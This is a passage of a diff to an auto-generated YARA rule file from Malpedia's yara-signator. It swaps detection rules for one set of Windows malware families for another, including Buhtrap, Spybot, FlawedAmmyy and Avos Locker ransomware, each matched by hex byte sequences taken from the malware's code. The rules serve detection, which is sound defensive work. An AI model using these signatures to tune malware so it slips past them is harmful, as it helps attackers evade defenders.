+		$sequence_7 = { c64424388d c6442439b5 c644242c81 c644242dc3 c644243e85 c644243fff }
+		$sequence_8 = { 8d542410 53 8944247c 53 894c2468 89542474 }
+		$sequence_9 = { 8bf8 ff5204 894708 a1???????? 50 57 }
 
 	condition:
-		7 of them and filesize < 18759680
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Hunters_International_Auto : FILE
+rule MALPEDIA_Win_Buhtrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8636829-de8e-581c-ad4e-c31c44dd9781"
+		id = "05b4ba66-68ba-54c1-8d1c-18fdeb619511"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunters_international"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hunters_international_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buhtrap_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "9c91c92551d0b4c31eb2166ecca4cb74b9d63e524f9ede84d728adc0424bfc5e"
+		logic_hash = "eac17ec81dd5c0445bcaac0e052f572182cee6f02fda0d2839f8933537f248ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142016,32 +141775,37 @@ rule MALPEDIA_Win_Hunters_International_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c641040c e9???????? c641040d e9???????? }
-		$sequence_1 = { e9???????? c641040d e9???????? c641040e e9???????? c641040f e9???????? }
-		$sequence_2 = { 241f 3c1f 750f c70100000000 c641041f }
-		$sequence_3 = { c641040c e9???????? c641040d e9???????? c641040e }
-		$sequence_4 = { c6410402 e9???????? c6410405 e9???????? c641040c e9???????? c641040d }
-		$sequence_5 = { c6410405 e9???????? c641040c e9???????? c641040d e9???????? }
-		$sequence_6 = { 750f c70100000000 c641041f c6410810 }
-		$sequence_7 = { c6410400 e9???????? c6410402 e9???????? c6410405 }
-		$sequence_8 = { c6410402 e9???????? c6410405 e9???????? }
-		$sequence_9 = { c641040c e9???????? c641040d e9???????? c641040e e9???????? }
+		$sequence_0 = { e8???????? 59 59 84c0 0f8435010000 }
+		$sequence_1 = { ff5010 837df000 0f84e7000000 85c0 0f85c9000000 }
+		$sequence_2 = { 8d442454 50 53 6a0a 5a e8???????? 50 }
+		$sequence_3 = { 53 ffd6 8bd8 2b5dfc 895dec }
+		$sequence_4 = { 66895dec 8bf3 8afb 8bc6 8a9c35ecfeffff }
+		$sequence_5 = { 8d4df0 51 8d4df8 51 6a01 6aff 52 }
+		$sequence_6 = { 57 ffd6 57 8945fc ffd6 59 59 }
+		$sequence_7 = { ba0a010000 b9???????? e8???????? 83ec0c be???????? }
+		$sequence_8 = { ff75f4 ff15???????? 8b45e8 5e }
+		$sequence_9 = { 8d742414 c744241401234567 c744241889abcdef c744241cfedcba98 }
+		$sequence_10 = { 8945fc 8a040a 8801 41 }
+		$sequence_11 = { c645ff00 897df8 3bdf 0f84ad010000 8b4634 }
+		$sequence_12 = { 807d1000 50 ff7508 740c }
+		$sequence_13 = { 8b4508 c7403401000000 8b45f8 3bc6 }
+		$sequence_14 = { 765c 837c241000 7655 51 e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 1377280
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Spaceship_Auto : FILE
+rule MALPEDIA_Win_Spybot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9646ae9-48ad-52ca-8e30-ca37f230b031"
+		id = "f487b739-5a23-52d3-8b27-57437fc4fe82"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spaceship_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spybot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "918a94f75a146e2a40061812363f222c7587d1698068cc2f3629d9e72d72f097"
+		logic_hash = "086db381edc017239cf316ebb3a9419f50149c95f9ac3a29e8ecb7d10b4a280d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142055,32 +141819,32 @@ rule MALPEDIA_Win_Spaceship_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? f2ae 8bcb 4f c1e902 f3a5 8bcb }
-		$sequence_1 = { 66395cc416 f3a4 74c1 81e2ffff0000 83c9ff 03d0 33c0 }
-		$sequence_2 = { 66c78424bc0100000d00 66898424be010000 c78424c00100001c6b4100 66c78424c40100002500 }
-		$sequence_3 = { 8bcb 83e103 f3a4 83c9ff bf???????? f2ae f7d1 }
-		$sequence_4 = { f2ae 8bcb 4f c1e902 f3a5 8b45f0 }
-		$sequence_5 = { 80a0c0d9410000 40 3bc6 72be 5e c9 c3 }
-		$sequence_6 = { 6a00 6810040000 ff15???????? 8bf0 56 ffd5 }
-		$sequence_7 = { 66899c24e6040000 c78424e80400001c674100 66c78424ec0400004a00 66899c24ee040000 c78424f004000014674100 66c78424f40400001e00 66899c24f6040000 }
-		$sequence_8 = { 8a441c0c 8d741c0c 84c0 75bc 5f 5e }
-		$sequence_9 = { c7842408050000f8664100 66c784240c0500002000 6689ac240e050000 c7842410050000f0664100 66899c2414050000 6689842416050000 c7842418050000e4664100 }
+		$sequence_0 = { 8975f8 8975f0 68???????? ff750c ff7508 e8???????? 83c418 }
+		$sequence_1 = { 6a03 8b5c2414 99 59 33ff f7f9 8bf2 }
+		$sequence_2 = { 59 e9???????? 57 68???????? e8???????? 59 85c0 }
+		$sequence_3 = { 33f6 ff7508 56 ff15???????? 85c0 7429 }
+		$sequence_4 = { 33f6 ffb56cffffff 57 e8???????? 59 85c0 59 }
+		$sequence_5 = { 8945f0 8945f4 8945f8 8945fc a1???????? 85c0 7411 }
+		$sequence_6 = { 8bb43570ffffff 3bf3 897508 0f8469a4ffff 399d54ffffff 0f855da4ffff 68???????? }
+		$sequence_7 = { ff7020 8d85fcfdffff 68???????? 50 e8???????? 6a01 }
+		$sequence_8 = { ff7514 8975fc e8???????? 56 8945ec ff7510 897514 }
+		$sequence_9 = { e9???????? ffb570ffffff 68???????? e8???????? 59 85c0 59 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 2367488
 }
-rule MALPEDIA_Win_Taidoor_Auto : FILE
+rule MALPEDIA_Win_Sierras_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba437ab9-6c90-576a-83d2-5801ebb87e42"
+		id = "a99a7c2f-d459-55f5-a4a0-be6e81d58ab8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taidoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sierras_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "7b8ed6f15654e580fefed39d2d4fea0473e69a1fd6a98339a075f2fbcf4be749"
+		logic_hash = "b308bc717193dd71ac31a34af288e6c64991ecd536fc577f8480631d4b62be23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142094,32 +141858,38 @@ rule MALPEDIA_Win_Taidoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7433 ff750c 889c05f4fbffff 50 8d85f4fbffff 6a01 50 }
-		$sequence_1 = { 395d10 7e1b 56 8b450c }
-		$sequence_2 = { 897df0 50 56 e8???????? 8b3d???????? 83f86f 750c }
-		$sequence_3 = { 83a00401000000 b001 c9 c20800 8b8104010000 }
-		$sequence_4 = { 7e24 8a0406 fec0 3c3a 8845ec }
-		$sequence_5 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db }
-		$sequence_6 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? }
-		$sequence_7 = { e9???????? 8d4de0 e8???????? 8d8588f7ffff 50 ff35???????? ffd6 }
-		$sequence_8 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc }
-		$sequence_9 = { 53 50 53 c7458844000000 }
+		$sequence_0 = { e9???????? 8dbc24fc000000 83c9ff 33c0 f2ae }
+		$sequence_1 = { 83c408 8d94242c070000 52 ffd5 83f8ff 7516 8d84241c030000 }
+		$sequence_2 = { 8974243c 741a 56 57 e8???????? 83c660 83c408 }
+		$sequence_3 = { 817e601e010000 89465c 895df0 773e 837e641e 7738 }
+		$sequence_4 = { 017514 03fb 3b7d10 72b0 8b5df0 834dfcff 8d4de0 }
+		$sequence_5 = { f6461104 745f 83ff10 7321 837df800 0f84440d0000 8b45fc }
+		$sequence_6 = { ffd6 57 ffd6 8bc3 5b 5f 5e }
+		$sequence_7 = { ffd7 c745fcffffffff e8???????? 33c0 8b4df0 64890d00000000 }
+		$sequence_8 = { 897dfc 0f8cc0000000 837d0801 7e58 }
+		$sequence_9 = { 33c0 f2ae f7d1 49 0f8452030000 8d8c24fc000000 }
+		$sequence_10 = { 56 8bf1 57 68???????? 8d8608020000 50 ff15???????? }
+		$sequence_11 = { 8bc3 837d0800 50 8b450c 7511 8b4dec }
+		$sequence_12 = { 57 e8???????? 85c0 750d ff15???????? }
+		$sequence_13 = { c3 56 8bf1 e8???????? 8b8610010000 }
+		$sequence_14 = { 56 50 7507 e8???????? eb05 e8???????? 0175f0 }
+		$sequence_15 = { 837d0803 0f8fb0000000 397d10 897df0 0f86a4000000 8b7d14 8b450c }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Attor_Auto : FILE
+rule MALPEDIA_Win_Veletrix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9165df3a-0588-5937-bb39-c85fa6fb26bb"
+		id = "a5f5b762-13c6-553b-b699-839d4e6ceb4f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.attor_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veletrix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.veletrix_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0c87726814bf53a9906b73b9a1468bc9095c79fe1e564f252fa0222653b1264a"
+		logic_hash = "caf3f0b619f428452505d9ee8537497d80964f351312a5e0d2c1e4059a2feec7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142133,40 +141903,34 @@ rule MALPEDIA_Win_Attor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f801 7411 3d81000000 740a }
-		$sequence_1 = { 488bea 4c8be1 4889742440 4885c9 }
-		$sequence_2 = { 0f84aa000000 4885d2 0f84a1000000 48895c2448 488d5a08 }
-		$sequence_3 = { 498bcd e8???????? 4c8b6c2448 4d85e4 }
-		$sequence_4 = { 48896810 488970e0 488978d8 33db 4c8970d0 4532e4 33f6 }
-		$sequence_5 = { 4885c9 7427 488b842490000000 48899c2490000000 }
-		$sequence_6 = { 4889442430 e8???????? 48399c2480000000 0f84ef000000 }
-		$sequence_7 = { 4c8b6c2448 4d85e4 740f 33c9 e8???????? }
-		$sequence_8 = { 83c404 83e103 f3aa 8b442414 85c0 }
-		$sequence_9 = { 8bcf 8b7c2414 8bd1 33c0 c1e902 }
-		$sequence_10 = { 740a 83f808 7405 83f811 }
-		$sequence_11 = { 33ff 3bf7 c644241300 897c2418 897c241c 897c2414 0f8423010000 }
-		$sequence_12 = { ff15???????? 89442420 8d442414 8d4c2420 50 51 }
-		$sequence_13 = { 7411 6a00 e8???????? 56 ff15???????? 83c408 8b442430 }
-		$sequence_14 = { 57 ffd6 83c408 8b7c2428 85ff 740d }
-		$sequence_15 = { e8???????? 83c40c 3bc7 8944241c 0f84f3000000 }
+		$sequence_0 = { 7408 488bc2 e9???????? 4d3bc4 0f84d9000000 8b7500 498b9cf6c0920100 }
+		$sequence_1 = { f20f59ee f20f5ce9 f2410f1004c1 488d1576860000 f20f1014c2 }
+		$sequence_2 = { 85c0 742a 488bc5 4c8d05f5250100 488bcd 48c1f906 83e03f }
+		$sequence_3 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2d461a0100 448bf3 }
+		$sequence_4 = { 4c8d0d057c0000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? f20f10e0 }
+		$sequence_5 = { c7459856697274 488bcb c7459c75616c50 4c8be0 c745a0726f7465 }
+		$sequence_6 = { e8???????? 488b8f90000000 483b0d???????? 7417 488d05243d0100 }
+		$sequence_7 = { 4c8d4c2448 488b4f10 41b840000000 ff542430 8b4f04 ba00080000 }
+		$sequence_8 = { 48894df7 488945ef 488d0d8668ffff 83e03f 458be9 4d03e8 4c8945df }
+		$sequence_9 = { 4c896daf 49c1fc06 4c8d34c0 4a8b84e100970100 4a8b44f028 }
 
 	condition:
-		7 of them and filesize < 2023424
+		7 of them and filesize < 234496
 }
-rule MALPEDIA_Win_Sedll_Auto : FILE
+rule MALPEDIA_Win_Redsalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c98327c8-f977-5098-aace-6f65383d00ba"
+		id = "a92418fc-758f-521f-ba9d-200fd663af62"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sedll_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redsalt_auto.yar#L1-L221"
 		license_url = "N/A"
-		logic_hash = "df74daada1e394daccd88b8caf7c67ee5c703bfd5e5886cc476e5ba06e59b034"
+		logic_hash = "50c9943074c934238ab56a2e724604fcafa0395a42717f2167a9dcfc691be6fb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -142178,32 +141942,47 @@ rule MALPEDIA_Win_Sedll_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75fc f30f7f45dc 6a00 6a00 6a00 }
-		$sequence_1 = { 741e 8bd3 8d4a01 8d642400 8a02 }
-		$sequence_2 = { 5e 8908 33c0 5d c20c00 8b4510 33c9 }
-		$sequence_3 = { 8d55f8 52 c745f800000000 68???????? 8b08 50 ff11 }
-		$sequence_4 = { 7412 f30f6f05???????? 8b4520 f30f7f00 830e04 f6c101 7426 }
-		$sequence_5 = { 83c604 83ef04 73ef 8b4d08 8b4510 51 8908 }
-		$sequence_6 = { 8bf0 83c404 8975e8 85f6 7507 5f }
-		$sequence_7 = { 7c7e 8d9b00000000 0fb60f 83c604 c1e902 }
-		$sequence_8 = { 50 8b4508 03c6 50 53 ff15???????? 85c0 }
-		$sequence_9 = { 884e01 885602 83c603 33c9 47 3bfb }
+		$sequence_0 = { 83c414 33c9 83f8ff 0f95c1 }
+		$sequence_1 = { 750b 68e8030000 ff15???????? e8???????? }
+		$sequence_2 = { 51 ffd6 85c0 7510 }
+		$sequence_3 = { c745d060ea0000 6a04 8d45d0 50 6806100000 68ffff0000 }
+		$sequence_4 = { e8???????? 85c0 750a 6a32 }
+		$sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? }
+		$sequence_6 = { 740d 68???????? e8???????? 83c404 833d????????02 }
+		$sequence_7 = { 83c9ff 85f6 7c0e 83fe7f 7f09 }
+		$sequence_8 = { 6a00 52 c744242401000000 8944242c c744243002000000 }
+		$sequence_9 = { 7509 80780120 7503 83c002 }
+		$sequence_10 = { 83c40c eb02 33c0 8b4df4 }
+		$sequence_11 = { c60100 5f 5e 33c0 }
+		$sequence_12 = { 8d8530fcffff 50 e8???????? 83c40c }
+		$sequence_13 = { e8???????? 83c408 6800010000 68???????? }
+		$sequence_14 = { c6450000 5e 5d 8911 33c0 }
+		$sequence_15 = { f7e7 8bea d1ed 33c0 83ef03 8a06 }
+		$sequence_16 = { c1fa04 c0e302 0ad3 83c004 }
+		$sequence_17 = { 833800 750f c705????????01000000 e9???????? }
+		$sequence_18 = { c644243423 c644243572 c64424367a c644243700 }
+		$sequence_19 = { d2cc bbe3b46b7e 6aa2 dd45ff }
+		$sequence_20 = { de6c58ae c8201cdd f7be5b408d58 1b7f01 d2cc }
+		$sequence_21 = { e8???????? 89ff 152edf0800 488b5c2440 }
+		$sequence_22 = { e8???????? 89fa 4989d8 4889c1 e8???????? }
+		$sequence_23 = { e8???????? 89f8 eb26 f6411840 7406 }
+		$sequence_24 = { e8???????? 8b05???????? 0d80000000 8905???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 2957312
 }
-rule MALPEDIA_Win_Cheesetray_Auto : FILE
+rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9541e7b5-55cf-5f67-8b69-be87df55796a"
+		id = "7a191507-05f1-515e-ae93-69990858de4e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cheesetray_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_ugx_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8cd561aadd1b5e2f7790bac0781a0595445a0cbe8294d61c87c9d05b79f48756"
+		logic_hash = "da5aed5a4142e6d6386e692fafe9cfc551187544798ccc57d23b8cb2bec2ee67"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142217,32 +141996,32 @@ rule MALPEDIA_Win_Cheesetray_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83b8a400000000 894d10 7666 8b88a0000000 8b0419 03cb 85c0 }
-		$sequence_1 = { 8b0c8d80ce4400 83e01f c1e006 8d440124 8b4d10 8a10 }
-		$sequence_2 = { 75f7 03c0 50 8d4dfc 51 52 e8???????? }
-		$sequence_3 = { 8b8c24a4000000 83c40c 6a02 51 68???????? ba1f000000 }
-		$sequence_4 = { 81ec84000000 56 6880000000 6a00 8d4580 50 e8???????? }
-		$sequence_5 = { 56 6800100000 6a03 56 6a03 6800000080 57 }
-		$sequence_6 = { 8b5318 52 e8???????? 8b4314 50 e8???????? 83c414 }
-		$sequence_7 = { 40 8945fc 3b85f8feffff 72ad 8b4508 6a00 6a00 }
-		$sequence_8 = { 720e 8b4c2410 3b4c2420 0f83b1000000 8b3d???????? 8d9b00000000 68ff1f0000 }
-		$sequence_9 = { 8d4df4 51 56 e8???????? 6a04 8d9594fdffff }
+		$sequence_0 = { ff969c060000 3bc3 89458c 0f8497030000 }
+		$sequence_1 = { 57 ff969c060000 3bc3 8945d8 0f8487020000 }
+		$sequence_2 = { 50 ff7508 ff969c060000 3bc3 8945bc 0f84a2040000 8b7db4 }
+		$sequence_3 = { ff55c0 57 ff55f8 ff55e8 }
+		$sequence_4 = { 50 e8???????? 6a01 6a10 57 68420d0000 }
+		$sequence_5 = { aa 33c0 8d7d9d 885d9c c645d47a ab ab }
+		$sequence_6 = { 50 ff15???????? 85c0 7455 8d85a8feffff }
+		$sequence_7 = { 8d86a4080000 50 57 ff969c060000 3bc3 894594 0f84a7020000 }
+		$sequence_8 = { f3ab 66ab aa 33c0 8d7de9 885de8 8b7508 }
+		$sequence_9 = { e9???????? 8d86ae090000 50 57 ff969c060000 3bc3 8945c0 }
 
 	condition:
-		7 of them and filesize < 8626176
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Roll_Sling_Auto : FILE
+rule MALPEDIA_Win_Hunter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "291394b2-c9d5-58b3-b157-b1e8265d7d6c"
+		id = "114c619e-d3db-54d7-bef7-7645d901bc94"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roll_sling_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hunter_auto.yar#L1-L90"
 		license_url = "N/A"
-		logic_hash = "fde2b7753670b142ee16bd9c69d80bdb5da3ac212825981d31dd1e2015cde6f5"
+		logic_hash = "776a5d8eb049aeb15b1138e40f903b0e7294cf0475240df008d707aa37c36610"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142256,34 +142035,32 @@ rule MALPEDIA_Win_Roll_Sling_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ba04000000 488bcf e8???????? 498bce 48833d????????10 480f430d???????? }
-		$sequence_1 = { 492bd0 4803d7 e8???????? 4533c9 4533c0 }
-		$sequence_2 = { 42385cf839 0f84ca000000 488d05a9ee0000 4a8b0ce8 488d55f0 4a8b4cf928 }
-		$sequence_3 = { 4c8d0d63b40000 8bda 4c8d0552b40000 488bf9 488d1550b40000 b904000000 e8???????? }
-		$sequence_4 = { 440f44d2 0fb74806 41ffc4 4c8b442468 4883c328 443be1 }
-		$sequence_5 = { 4883c227 4d8b6df8 492bc5 4883c0f8 4883f81f 0f877c040000 498bcd }
-		$sequence_6 = { 483bc3 7306 4c8bf3 488bd8 4533c9 4c8bc3 }
-		$sequence_7 = { 448bb090000000 4d03f7 498bce ff15???????? 85c0 0f8530010000 }
-		$sequence_8 = { eb14 4889742420 4c8d4da0 488bd6 }
-		$sequence_9 = { 4c89742428 4c897c2420 e8???????? 488bcb 488bf0 e8???????? }
+		$sequence_0 = { 0000 9c 35a035a435 a835 }
+		$sequence_1 = { 0145f4 8d45b4 8b55f0 8b4de4 }
+		$sequence_2 = { 01442428 59 11742428 85db }
+		$sequence_3 = { 0145e8 8d838e000000 3bc2 8b45e8 }
+		$sequence_4 = { 01442444 53 11542444 51 }
+		$sequence_5 = { 0103 115304 e9???????? 8b4c241c }
+		$sequence_6 = { 014140 89413c 899604010000 e9???????? }
+		$sequence_7 = { 00443907 8a043a 88043b 8a443a01 }
 
 	condition:
-		7 of them and filesize < 299008
+		7 of them and filesize < 1056768
 }
-rule MALPEDIA_Win_Unidentified_076_Auto : FILE
+rule MALPEDIA_Win_Flawedammyy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "320fec8e-f3fe-5339-a2f9-df370980c853"
+		id = "e3c09ec0-5af5-5a07-8c2f-fc3c122b7323"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_076_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flawedammyy_auto.yar#L1-L303"
 		license_url = "N/A"
-		logic_hash = "d906c6adbfb453b72e8affe711020332823b8e590c569caecb0bdba54a063334"
+		logic_hash = "4b49ab8817339f4687e717d3eeefa35a990a787f8625678c6db9867d20e78208"
 		score = 75
-		quality = 75
+		quality = 33
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -142295,32 +142072,54 @@ rule MALPEDIA_Win_Unidentified_076_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f95c3 488b6c2438 488b742440 488b7c2448 8bc3 488b5c2430 4883c420 }
-		$sequence_1 = { 85c0 7f2d 488b86c8000000 33db ff9050010000 41b8fe010000 488bce }
-		$sequence_2 = { 4155 4156 4881ec20010000 488b81c8000000 488bd9 488bf2 488d4c2440 }
-		$sequence_3 = { 498bcc ff9020070000 488b8e50020000 488b96c8000000 4963c6 4869d814030000 }
-		$sequence_4 = { 03d0 41ffc9 75f0 443bda 0f8524010000 44895f30 896f34 }
-		$sequence_5 = { 41b900008000 ba0e660000 4c89742420 ff9080050000 85c0 7522 488b87c8000000 }
-		$sequence_6 = { ffc1 448bf2 483bc8 0f86b2000000 bf08000000 eb03 4803ff }
-		$sequence_7 = { 488b81c8000000 498bc8 ff9080000000 33c9 33d2 4c63c0 85c0 }
-		$sequence_8 = { 488bcb 448d4202 e8???????? 488b93c8000000 488d4df0 ff92f0070000 83a3c802000000 }
-		$sequence_9 = { 0fb74603 440fb6c0 c1e808 41c1e008 440bc0 41833e00 44894530 }
+		$sequence_0 = { 0022 8a4200 828a4200bb8a42 00ff }
+		$sequence_1 = { 004bbf 42 0062bf 42 }
+		$sequence_2 = { ffd3 f30f7e45ec 8b4df4 83ec10 8b11 }
+		$sequence_3 = { 68???????? 8d4df0 e8???????? 8b00 85c0 7404 8b10 }
+		$sequence_4 = { 8d8da0f6ffff 6a00 6a23 51 6a00 ffd0 8b35???????? }
+		$sequence_5 = { 0062bf 42 0079bf 42 }
+		$sequence_6 = { 68f1cbf7ae 6a01 e8???????? 83c408 }
+		$sequence_7 = { 002a e342 0039 e342 }
+		$sequence_8 = { ff5108 8b45fc 50 8b08 ff5108 8b45e4 }
+		$sequence_9 = { 59 8b7d08 833cfde897410000 755b }
+		$sequence_10 = { 0039 e342 0048e3 42 }
+		$sequence_11 = { 0000 0404 0404 0404 0401 }
+		$sequence_12 = { 83ec10 660fd600 f30f7e45ac 660fd64008 f30f7e8578ffffff 8bc4 }
+		$sequence_13 = { c78508ffffff44000000 66898538ffffff e8???????? 83c404 85c0 7511 68???????? }
+		$sequence_14 = { 00b3854200e5 854200 37 864200 }
+		$sequence_15 = { 0018 874200 58 874200 }
+		$sequence_16 = { 7e09 8a0e 880a 4a 4e 48 75f7 }
+		$sequence_17 = { ff75ac 8b3d???????? ffd7 ff75a8 }
+		$sequence_18 = { 5e 5b c3 55 8bec 81ec5c040000 }
+		$sequence_19 = { e9???????? 33c0 8b7df4 8b0c855c303400 c1e705 }
+		$sequence_20 = { 53 ff75dc 6813100000 ff35???????? ffd6 }
+		$sequence_21 = { ff15???????? eb08 6a64 ff15???????? 53 ff75a8 ff15???????? }
+		$sequence_22 = { eb0e 8b14957c303400 49 0fafd1 0155fc }
+		$sequence_23 = { 7426 8b483c ba???????? 03c8 50 66c741160e01 66c7415c0300 }
+		$sequence_24 = { 8b0c855c303400 c1e705 33d2 03fe }
+		$sequence_25 = { 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 3b45f4 7e03 8945f4 }
+		$sequence_26 = { 7516 68???????? e8???????? 53 ff15???????? e9???????? }
+		$sequence_27 = { 56 8a0a 80f930 7569 }
+		$sequence_28 = { c745e8ff000000 8b3c857c303400 c745ecffff0000 0faff9 83f801 c745f0ffffff00 741f }
+		$sequence_29 = { 8b4d08 8a0408 a2???????? eb07 c605????????00 c705????????4c403400 ff7508 }
+		$sequence_30 = { 7518 8b46f8 8b04855c303400 c1e002 50 6a40 }
+		$sequence_31 = { 83f907 0f8781000000 ff248dfd243400 881f eb76 ff30 eb63 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 1350656
 }
-rule MALPEDIA_Win_Sepsys_Auto : FILE
+rule MALPEDIA_Win_Avos_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c07920dc-ecf4-5d0c-836a-1794c74b71bf"
+		id = "039bebd7-5f26-5f3f-b924-0aa65f143ed6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
